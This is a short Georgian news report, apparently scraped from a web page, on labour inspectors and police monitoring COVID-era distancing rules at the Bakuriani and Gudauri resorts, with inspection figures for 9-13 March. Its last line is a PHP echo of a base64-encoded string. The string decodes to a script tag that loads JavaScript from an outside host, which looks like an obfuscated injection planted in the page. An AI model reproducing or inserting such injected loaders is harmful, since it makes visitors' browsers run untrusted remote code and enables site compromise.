celsiusi
ავერსი შნაიდერი
ბაკურიანსა და გუდაურში არსებულ ვითარებაზე მონიტორინგს შრომის ინსპექტორთა ჯგუფები შინაგან საქმეთა სამინისტროს საპატრულო და კრიმინალურ პოლიციასთან ერთად, უწყვეტ რეჟიმში განაგრძობენ.
 
როგორც ჯანდაცვის სამინისტროს მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, ამ დროისთვის, დამსვენებელთა შორის სოციალური დისტანციის, ნაკადების კონტროლის დაცვისა და ერთ სივრცეში მაღალი კონცენტრაციის პრევენციის მიზნით, ბადეების საშუალებით მიმდინარეობს სპეციალური დერეფნების მოწყობა.
 
„პარალელურად, გრძელდება ინსპექტორთა ჯგუფების ჩართულობით ობიექტების მხრიდან დადგენილი რეკომენდაციების დაცვაზე კონტროლი. ასევე, ინსპექტორები ზედამხედველობას უწევენ ობიექტების შესასვლელებს.
 
9-13 მარტის პერიოდში შრომის ინსპექციამ გუდაურსა და ბაკურიანში სულ 186 ობიექტი შეამოწმა. პრევენციული მიზნებიდან გამომდინარე, მათგან 146-ზე გაიცა ზეპირსიტყვიერი გაფრთხილება, 18 პროტოკოლის დაცვაზე კითხვარის საშუალებით შემოწმდა. 22 ობიექტის გადამოწმებისას კი დადგინდა, რომ წესების დაცვით ოპერირებდნენ.
 
შრომის ინსპექციის სამსახური საკურორტო ზონებში განთავსებული ობიექტების ხელმძღვანელებსა და მოქალაქეებს მიმართავს. უწყება მოუწოდებს, გამოიჩინონ მაღალი მოქალაქეობრივი თვითშეგნება და დაიცვან ჯანდაცვის სამინისტროს მიერ გაცემული რეკომენდაციები“, - ნათქვამია განცხადებაში.
1277
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");